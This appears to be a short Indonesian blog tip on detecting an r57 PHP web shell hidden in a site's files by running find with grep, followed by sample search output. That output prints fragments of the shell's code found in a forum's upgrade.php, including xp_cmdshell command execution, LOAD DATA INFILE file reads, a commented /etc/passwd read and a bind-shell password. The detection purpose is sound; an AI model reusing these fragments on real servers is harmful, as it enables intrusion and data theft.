Ecek-ecek

Cara ini hanya bisa dilakukan jika kamu bisa melakukan command shell di hosting kamu. Melalui ssh atau bisa juga melalui phpshell. Syarat lain nya, server hostingnya harus *NIX, dah diperbolehkan menjalankan program "find" dan "grep".

Ini command pencarian nya

1. find /home/userkamu/public_html -name "*.php" berguna untuk mencari semua file dengan akstensi .php, pencarian dimulai dari direktori /home/userkamu/public_html
2. -exec grep -H "r57" \{\} \; >hasil.txt& artinya hasil pencarian tadi akan dilihat isi filenya dan jika ada file yang mengandung kata r57 maka nama file tersebut beserta baris yang mengandung kata r57 akan dituliskan ke file baru yaitu file hasil.txt, sedangkan yg di akhir berupa karakter & artinya semua perintah tadi berjalan di background

Begitulah kira-kira :)

Contoh hasil pencarian
/home/userkamu/public_html/forum/upgrade.php: exit("<b><a href=fbi.com>r57-shell</a> : Dilarang mas</b>"); /home/userkamu/public_html/forum/upgrade.php:if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } /home/userkamu/public_html/forum/upgrade.php:@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; /home/userkamu/public_html/forum/upgrade.php:@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} /home/userkamu/public_html/forum/upgrade.php:<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> /home/userkamu/public_html/forum/upgrade.php: if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } /home/userkamu/public_html/forum/upgrade.php: $sql = "DROP TABLE IF EXISTS temp_r57_table;"; /home/userkamu/public_html/forum/upgrade.php: $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; /home/userkamu/public_html/forum/upgrade.php: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; /home/userkamu/public_html/forum/upgrade.php: $sql = "SELECT * FROM temp_r57_table;"; /home/userkamu/public_html/forum/upgrade.php: $sql = "DROP TABLE IF EXISTS temp_r57_table;"; /home/userkamu/public_html/forum/upgrade.php: @mssql_query("drop table r57_temp_table",$db); /home/userkamu/public_html/forum/upgrade.php: @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); /home/userkamu/public_html/forum/upgrade.php: @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); /home/userkamu/public_html/forum/upgrade.php: $res = mssql_query("select * from r57_temp_table",$db); /home/userkamu/public_html/forum/upgrade.php: @mssql_query("drop table r57_temp_table",$db); /home/userkamu/public_html/forum/upgrade.php:echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); /home/userkamu/public_html/forum/upgrade.php:echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); /home/userkamu/public_html/forum/upgrade.php:echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));